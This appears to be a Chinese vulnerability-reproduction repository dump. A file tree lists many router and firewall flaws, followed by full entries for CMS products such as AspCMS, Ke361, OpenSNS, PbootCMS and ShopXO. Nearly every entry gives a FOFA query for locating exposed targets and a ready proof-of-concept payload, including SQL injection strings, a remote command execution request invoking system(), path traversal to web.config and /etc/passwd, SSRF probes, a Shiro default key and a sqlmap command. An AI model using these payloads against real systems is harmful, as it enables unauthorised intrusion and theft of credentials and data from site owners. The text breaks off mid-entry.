├── MSA 互联网管理网关 msa 任意文件下载漏洞.md ├── MagicFlow 防火墙网关 main.xp 任意文件读取漏洞.md ├── NetMizer 日志管理系统 cmd.php 远程命令执行漏洞.md ├── NetMizer 日志管理系统 data 目录遍历漏洞.md ├── NetMizer 日志管理系统 登录绕过漏洞.md ├── Sapido 多款路由器 远程命令执行漏洞.md ├── Selea OCR-ANPR摄像机 SeleaCamera 任意文件读取漏洞.md ├── Selea OCR-ANPR摄像机 get_file.php 任意文件读取漏洞.md ├── SonicWall SSL-VPN 远程命令执行漏洞.md ├── TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084.md ├── TP-Link SR20 远程命令执行.md ├── TVT数码科技 NVMS-1000 路径遍历漏洞.md ├── Tenda 11N无线路由器 Cookie 越权访问漏洞.md ├── Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞.md ├── Wayos AC集中管理系统默认弱口令 CNVD-2021-00876.md ├── Wayos 防火墙 后台命令执行漏洞.md ├── Wayos 防火墙 账号密码泄露漏洞.md ├── XAMPP phpinfo.php 信息泄漏漏洞.md ├── ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725.md ├── Zyxel NBG2105 身份验证绕过 CVE-2021-3297.md ├── Zyxel 硬编码后门账户漏洞 CVE-2020-29583.md ├── iKuai 流控路由 SQL注入漏洞.md ├── rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞.md ├── rConfig ajaxEditTemplate.php 后台远程命令执行漏洞.md ├── rConfig useradmin.inc.php 信息泄露漏洞.md ├── rConfig userprocess.php 任意用户创建漏洞.md ├── 三星 WLAN AP WEA453e路由器 远程命令执行漏洞.md ├── 中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110.md ├── 中国移动 禹路由 simple-index.asp 越权访问漏洞 CNVD-2020-55983.md ├── 中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞.md ├── 中科网威 下一代防火墙控制系统 账号密码泄露漏洞.md ├── 佑友防火墙 后台命令执行漏洞.md ├── 华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞.md ├── 华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞.md ├── 华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞.md ├── 博华网龙防火墙 cmd.php 远程命令执行漏洞.md ├── 博华网龙防火墙 users.xml 未授权访问.md ├── 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞.md ├── 启明星辰 天清汉马USG防火墙 默认口令漏洞.md ├── 大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞.md ├── 奇安信 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞.md ├── 奇安信 网康 下一代防火墙 router 远程命令执行漏洞.md ├── 宏电 H8922 Telnet后门漏洞 CVE-2021-28149.md ├── 宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152.md ├── 宏电 H8922 后台命令执行漏洞 CVE-2021-28150.md ├── 宏电 H8922 后台管理员信息泄露漏洞 CVE-2021-28151.md ├── 小米 路由器 c_upload 远程命令执行漏洞 CVE-2019-18370.md ├── 小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371.md ├── 悦泰节能 智能数据网关 resources 任意文件读取漏洞.md ├── 惠尔顿 e地通 config.xml 信息泄漏漏洞.md ├── 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328.md ├── 浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞.md ├── 烽火 HG6245D info.asp 信息泄露漏洞.md ├── 电信 中兴ZXHN F450A网关 默认管理员账号密码漏洞.md ├── 电信 天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞.md ├── 电信 网关配置管理系统 login.php SQL注入漏洞.md ├── 百卓 Patflow showuser.php 后台SQL注入漏洞.md ├── 百卓 Smart importhtml.php 远程命令执行漏洞.md ├── 皓峰防火墙 setdomain.php 越权访问漏洞.md ├── 磊科 NI360路由器 认证绕过漏洞.md ├── 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞.md ├── 网康 下一代防火墙 router 远程命令执行漏洞.md ├── 网御 Leadsec ACM管理平台 importhtml.php 远程命令执行漏洞.md ├── 网神 下一代极速防火墙 pki_file_download 任意文件读取漏洞.md ├── 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.md ├── 西迪特 Wi-Fi Web管理 Cookie 越权访问漏洞.md ├── 西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞.md ├── 迈普 ISG1000安全网关 任意文件下载漏洞.md ├── 锐捷 EG易网关 branch_passw.php 远程命令执行.md ├── 锐捷 EG易网关 cli.php 远程命令执行漏洞.md ├── 锐捷 EG易网关 download.php 任意文件读取漏洞.md ├── 锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞.md ├── 锐捷 EG易网关 管理员账号密码泄露漏洞.md ├── 锐捷 ISG 账号密码泄露漏洞.md ├── 锐捷 NBR 1300G路由器 越权CLI命令执行漏洞.md ├── 锐捷 NBR路由器 远程命令执行漏洞 CNVD-2021-09650.md ├── 锐捷 RG-UAC 账号密码信息泄露 CNVD-2021-14536.md ├── 锐捷 SSL VPN 越权访问漏洞.md ├── 锐捷 Smartweb管理系统 密码信息泄露漏洞.md ├── 锐捷 云课堂主机 pool 目录遍历漏洞.md ├── 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞.md └── 飞鱼星 家用智能路由 cookie.cgi 权限绕过.md /CMS漏洞/AspCMS commentList.asp SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # AspCMS commentList.asp SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | AspCMS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="ASPCMS" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 通过网站源码响应判断CMS 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170904613.png) 24 | 25 | 验证POC 26 | 27 | ```php 28 | /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170904678.png) 32 | 33 | 成功获取管理员账号以及密码的MD5 -------------------------------------------------------------------------------- /CMS漏洞/BSPHP index.php 未授权访问 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # BSPHP index.php 未授权访问 信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | BSPHP 存在未授权访问 泄露用户 IP 和 账户名信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | BSPHP 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "BSPHP" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 访问如下URL,泄露用户名与登录IP 22 | 23 | ```plain 24 | http://xxx.xxx.xxx.xxx/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0‘ 25 | ``` 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162317323.png) -------------------------------------------------------------------------------- /CMS漏洞/CxCMS Resource.ashx 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # CxCMS Resource.ashx 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | CxCMS 存在任意文件读取,由于 /Sys/Handler/Resource.ashx 页面 _FilePath 参数过滤不严,导致可以读取系统敏感文件。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | CxCMS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "Powered by CxCms" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 关键字"Powered by CxCms" 22 | 23 | ![image-20220518144245685](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181442728.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /Sys/Handler/Resource.ashx?_FilePath=../../web.config 29 | ``` 30 | 31 | ![image-20220518144331101](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181443193.png) -------------------------------------------------------------------------------- /CMS漏洞/Ke361 AuthManagerController.class.php 后台SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # Ke361 AuthManagerController.class.php 后台SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Ke361 AuthManagerController.class.php uid参数存在 SQL注入漏洞,通过漏洞可以获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Ke361 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | https://gitee.com/jcove/ke361 16 | 17 | ## 漏洞复现 18 | 19 | 存在漏洞的文件为 `Application/Admin/Controller/AuthManagerController.class.php` 20 | 21 | ![image-20220518153054883](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181530959.png) 22 | 23 | ``` 24 | /admin.php?s=/AuthManager/group/uid/1')%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+ 25 | ``` 26 | 27 | ![image-20220518153112030](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181531098.png) -------------------------------------------------------------------------------- /CMS漏洞/Ke361 DistrictController.class.php 后台SQL注入漏洞 CNVD-2021-25002.md: -------------------------------------------------------------------------------- 1 | # Ke361 DistrictController.class.php 后台SQL注入漏洞 CNVD-2021-25002 2 | 3 | ## 漏洞描述 4 | 5 | Ke361 DistrictController.class.php index() 函数 pid参数存在 SQL注入漏洞,通过漏洞可以获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Ke361 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | https://gitee.com/jcove/ke361 16 | 17 | ## 漏洞复现 18 | 19 | 存在漏洞的文件为 `Application/Admin/Controller/DistrictController.class.php` 20 | 21 | ![image-20220518153238593](C:/Users/47236/AppData/Roaming/Typora/typora-user-images/image-20220518153238593.png) 22 | 23 | 验证POC 24 | 25 | ``` 26 | admin.php?s=/District/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+ 27 | ``` 28 | 29 | ![image-20220518153336344](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181533405.png) -------------------------------------------------------------------------------- /CMS漏洞/Ke361 GoodsController.class.php SSRF漏洞.md: -------------------------------------------------------------------------------- 1 | # Ke361 GoodsController.class.php SSRF漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Ke361 GoodsController.class.php URL参数存在 SSRF漏洞,通过漏洞可以获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Ke361 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | https://gitee.com/jcove/ke361 16 | 17 | ## 漏洞复现 18 | 19 | 存在漏洞的文件为 `Application/Home/Controller/GoodsController.class.php` 20 | 21 | ![image-20220518153445715](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181534788.png) 22 | 23 | URL参数无任何过滤,传入 file_get_contents函数,造成SSRF漏洞,构造请求 24 | 25 | ``` 26 | POST /index.php?s=/Goods/ajGetGoodsDetial 27 | 28 | url=http://6si2gt.dnslog.cn 29 | ``` 30 | 31 | ![image-20220518153459466](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181534535.png) 32 | 33 | dnslog接收到请求 34 | 35 | ![image-20220518153527567](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181535619.png) -------------------------------------------------------------------------------- /CMS漏洞/Ke361 MenuController.class.php 后台SQL注入漏洞 CNVD-2021-25002.md: -------------------------------------------------------------------------------- 1 | # Ke361 MenuController.class.php 后台SQL注入漏洞 CNVD-2021-25002 2 | 3 | ## 漏洞描述 4 | 5 | Ke361 MenuController.class.php文件 index() 函数中的pid参数存在 SQL注入漏,导致攻击者通过漏洞可以获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Ke361 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | https://gitee.com/jcove/ke361 16 | 17 | ## 漏洞复现 18 | 19 | 存在漏洞的文件为 `Application/Admin/Controller/MenuController.class.php` 20 | 21 | ![image-20220518153611158](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181536242.png) 22 | 23 | Get 传参 pid 传入SQL语句 24 | 25 | ``` 26 | SELECT `id`,`title`,`pid`,`sort`,`url`,`hide`,`tip`,`group`,`is_dev`,`status` FROM `ke_menu` WHERE (id=1) 27 | ``` 28 | 29 | 使用括号闭合语句,构造SQL注入 30 | 31 | ``` 32 | /admin.php?s=/Menu/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+ 33 | ``` 34 | 35 | ![image-20220518153624882](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181536951.png) -------------------------------------------------------------------------------- /CMS漏洞/OpenSNS Application ShareController.class.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # OpenSNS Application ShareController.class.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | OpenSNS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1167011145" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170923817.png) 24 | 25 | 存在漏洞的文件 `Application/Weibo/Controller/ShareController.class.php` 26 | 27 | ![image-20220518154015894](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181540972.png) 28 | 29 | 发送Payload 30 | 31 | ```plain 32 | /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) 33 | ``` 34 | 35 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170923310.png) -------------------------------------------------------------------------------- /CMS漏洞/OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | OpenSNS AuthorizeController.class.php文件 ssoCallback() 函数存在命令执行漏洞,在登录的情况下可以获取服务器权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | OpenSNS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1167011145" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![image-20220518154117028](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181541097.png) 24 | 25 | 存在漏洞的文件为 `Application/Admin/Controller/AuthorizeController.class.php` 26 | 27 | ![image-20220518154127216](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181541309.png) 28 | 29 | 其中 config参数可控,构造请求就可以通过 file_put_contents 写入执行任意命令 30 | 31 | ![image-20220518154143157](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181541252.png) 32 | 33 | 构造请求包 34 | 35 | ``` 36 | POST /admin.php?s=/Authorize/ssoCallback\ 37 | 38 | config[SSO_CONFIG]=phpinfo(); 39 | ``` 40 | 41 | ![image-20220518154206103](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181542195.png) -------------------------------------------------------------------------------- /CMS漏洞/OpenSNS CurlModel.class.php SSRF漏洞.md: -------------------------------------------------------------------------------- 1 | # OpenSNS CurlModel.class.php SSRF漏洞 2 | 3 | ## 漏洞描述 4 | 5 | OpenSNS CurlModel.class.php文件中curl方法存在SSRF漏洞,通过漏洞攻击者可以探测内网信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | OpenSNS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1167011145" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![image-20220518154436896](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181544965.png) 24 | 25 | 存在漏洞的文件为 `Application/Admin/Model/CurlModel.class.php` 26 | 27 | ![image-20220518154502605](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181545686.png) 28 | 29 | 构造POC 30 | 31 | ``` 32 | /?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=http://92aq2z.dnslog.cn 33 | ``` 34 | 35 | ![image-20220518154516760](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181545840.png) -------------------------------------------------------------------------------- /CMS漏洞/OpenSNS ThemeController.class.php 后台任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | # OpenSNS ThemeController.class.php 后台任意文件上传漏洞 2 | 3 | ## 漏洞描述 4 | 5 | OpenSNS ThemeController.class.php文件中存在文件上传载,其中过滤不足导致可以上传至服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | OpenSNS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1167011145" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![image-20220518154644354](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181546412.png) 24 | 25 | 登录后的上传页面`/admin.php?s=/theme/add.html` 26 | 27 | ![image-20220518154658941](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181546002.png) 28 | 29 | 存在漏洞的文件为 `Application/Admin/Model/ThemeController.class.php` 30 | 31 | ![image-20220518154711821](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181547904.png) 32 | 33 | 其中只需要文件后缀为 zip和rar 就会成功上传并解压至当前的 Theme目录中 34 | 35 | ![image-20220518154728501](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181547562.png) -------------------------------------------------------------------------------- /CMS漏洞/OpenSNS ThemeController.class.php 后台任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # OpenSNS ThemeController.class.php 后台任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | OpenSNS ThemeController.class.php文件中存在文件下载,其中过滤不足导致可以下载服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | OpenSNS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1167011145" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![image-20220518154815562](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181548621.png) 24 | 25 | 存在漏洞的文件为 `Application/Admin/Model/ThemeController.class.php` 26 | 27 | ![image-20220518154826306](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181548388.png) 28 | 29 | 其中 theme参数为用户可控参数,根据函数流程可以发现存在的文件将会打包为 zip文件提供下载 30 | 31 | ![image-20220518154838931](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181548023.png) 32 | 33 | 构造请求 34 | 35 | ``` 36 | POST /admin.php?s=/theme/packageDownload 37 | 38 | theme=../Conf/common.php 39 | ``` 40 | 41 | ![image-20220518154851785](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181548889.png) -------------------------------------------------------------------------------- /CMS漏洞/Pb-CMS Shiro默认密钥 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Pd-CMS Shiro默认密钥 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Pd-CMS存在Shiro默认密钥,攻击者通过已知的密钥将会造成Shiro远程命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Pd-CMS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "pb-cms" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面 22 | 23 | ![image-20220518155442570](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181554764.png) 24 | 25 | 默认密钥 26 | 27 | ``` 28 | 3AvVhmFLUs0KTA3Kprsdag== 29 | ``` 30 | 31 | ![image-20220518155454512](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181554589.png) -------------------------------------------------------------------------------- /CMS漏洞/PbootCMS ext_price SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # PbootCMS ext_price SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | PbootCMS 存在SQL注入漏洞。通过漏洞可获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | PbootCMS < 1.2.1 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="PBOOTCMS" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170926840.png) 24 | 25 | 测试 Payload 26 | 27 | ```plain 28 | /index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123) 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170926157.png) -------------------------------------------------------------------------------- /CMS漏洞/PbootCMS search SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # PbootCMS search SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | PbootCMS < 1.2.1 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="PBOOTCMS" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 搜索框页面为 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170924485.png)Payload为 24 | 25 | ```plain 26 | /index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123) 27 | ``` 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170924075.png) -------------------------------------------------------------------------------- /CMS漏洞/ShopXO download 任意文件读取漏洞 CNVD-2021-15822.md: -------------------------------------------------------------------------------- 1 | # ShopXO download 任意文件读取漏洞 CNVD-2021-15822 2 | 3 | ## 漏洞描述 4 | 5 | ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | ShopXO 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="ShopXO企业级B2C电商系统提供商" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 商城主页如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170858707.png) 24 | 25 | 发送漏洞请求包 26 | 27 | ```plain 28 | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 29 | Host: 30 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 31 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 32 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 33 | Accept-Encoding: gzip, deflate 34 | Connection: close 35 | Upgrade-Insecure-Requests: 1 36 | ``` 37 | 38 | 其中 **/url/xxxx** 中的 base64 解码后为 **/etc/passwd** 39 | 40 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170859076.png) -------------------------------------------------------------------------------- /CMS漏洞/TypesetterCMS 后台任意文件上传.md: -------------------------------------------------------------------------------- 1 | # TypesetterCMS 后台任意文件上传 2 | 3 | ## 漏洞描述 4 | 5 | 可以通过将.php放在.zip文件中并解压缩来绕过对.php文件的保护。一旦完成,就可以使用恶意的php文件(webshell)在计算机上执行命令 6 | 7 | ## 影响版本 8 | 9 | ``` 10 | Typesetter CMS 5-5.1 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | 按如下步骤复现 16 | 17 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170930270.gif) 18 | 19 | ## 参考文章 20 | 21 | [Github 绕过文件上传限制导致命令执行](https://github.com/Typesetter/Typesetter/issues/674) 22 | 23 | -------------------------------------------------------------------------------- /CMS漏洞/WeiPHP5.0 bind_follow SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # WeiPHP5.0 bind_follow SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Weiphp5.0 所有使用了 wp_where() 函数并且参数可控的SQL查询均受到影响,前台后台均存在注入。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Weiphp5.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="WeiPHP" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162318466.png) 24 | 25 | 验证POC 26 | 27 | ```php 28 | /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+ 29 | ``` -------------------------------------------------------------------------------- /CMS漏洞/ezEIP 4.1.0 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # ezEIP 4.1.0 信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | ezEIP 4.1.0 存在信息泄露漏洞,通过遍历Cookie中的参数值获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | ezEIP 4.1.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "ezEIP" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 漏洞Url为 22 | 23 | ```plain 24 | /label/member/getinfo.aspx 25 | ``` 26 | 27 | 访问时添加Cookie(通过遍历获取用户的登录名电话邮箱等信息) 28 | 29 | ```plain 30 | WHIR_USERINFOR=whir_mem_member_pid=1; 31 | ``` 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162312106.png) -------------------------------------------------------------------------------- /CMS漏洞/原创先锋 后台管理平台 未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 原创先锋 后台管理平台 未授权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 原创先锋 后台管理平台 存在未授权访问漏洞,攻击者通过漏洞可以任意接管账户权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 原创先锋 后台管理平台 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="https://www.bjycxf.com" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 后台登陆页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170900160.png) 24 | 25 | 未授权的Url 26 | 27 | ```plain 28 | /admin/admin/admin_list.html 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170901271.png) 32 | 33 | 点击添加并授权即可获取后台模块权限 34 | 35 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170901060.png) 36 | 37 | ## 参考文章 38 | 39 | http://www.0dayhack.net/index.php/1693/ -------------------------------------------------------------------------------- /CMS漏洞/发货100 M_id SQL注入漏洞 CNVD-2021-30193.md: -------------------------------------------------------------------------------- 1 | # 发货100 M_id SQL注入漏洞 CNVD-2021-30193 2 | 3 | ## 漏洞描述 4 | 5 | 发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 发货100 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="1420424513" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170900267.png) 24 | 25 | 使用POC 26 | 27 | ```plain 28 | /?M_id=1%27&type=product 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170900051.png) 32 | 33 | 数据库出现报错, 使用Sqlmap注入 34 | 35 | ```plain 36 | sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id 37 | ``` 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170900124.png) -------------------------------------------------------------------------------- /CMS漏洞/快排CMS Socket.php 日志信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 快排CMS Socket.php 日志信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 快排CMS 默认开启日志记录,由于日志名为时间作为文件名,造成管理员的Cookie泄露 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 快排 CMS <= 1.2 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | https://gitee.com/qingzhanwang/kpcms 16 | 17 | ## 